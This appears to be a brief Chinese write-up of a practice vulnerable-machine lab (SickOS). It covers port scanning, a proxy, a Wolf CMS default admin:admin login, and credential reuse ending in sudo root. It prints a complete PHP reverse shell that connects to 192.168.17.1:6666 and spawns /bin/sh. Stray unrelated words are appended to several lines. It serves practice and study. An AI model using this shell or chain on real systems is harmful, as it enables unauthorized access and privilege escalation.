nmap 掃描一下端口linux
3128 端口開着一個代理服務,使用它提供的代理去訪問一下web
訪問 robots 獲得一個 cmsshell
訪問 robots.txt 中的 /wolfcms數據庫
搜一下,獲得後臺登陸頁面:/?/admin/loginbash
使用默認帳號密碼 admin:admin 登陸成功微信
後臺能夠寫文件啥的,寫個 php 的反彈 shellssh
<?php
$ip = '192.168.17.1';
$port = '6666';
$sock = fsockopen($ip, $port);
$descriptorspec = array(
0 => $sock,
1 => $sock,
2 => $sock
);
$process = proc_open('/bin/sh',$descriptorspec, $pipes);
proc_close($process);
?>
在 config.php 中找到了數據庫的用戶名與密碼編輯器
用數據庫的那個密碼試一下,登陸用戶:sickos,成功!
同時既然已經知道了密碼,sudo -s
直接拿到了 root 權限
沒學到什麼新的知識 Orz,如今作靶機感受愈來愈沒啥意思了,想一想該是由於是參考了別人的 wp 作出來的吧 。作了也 30 多個了,後面就儘可能本身作,反正跟 CTF 題同樣必然有解,這樣應該就不能一週一更了,畢竟大部分時間仍是想放在 pwn 的學習上。
就這字數還不夠!?阿巴阿巴阿巴阿巴阿巴阿巴🤤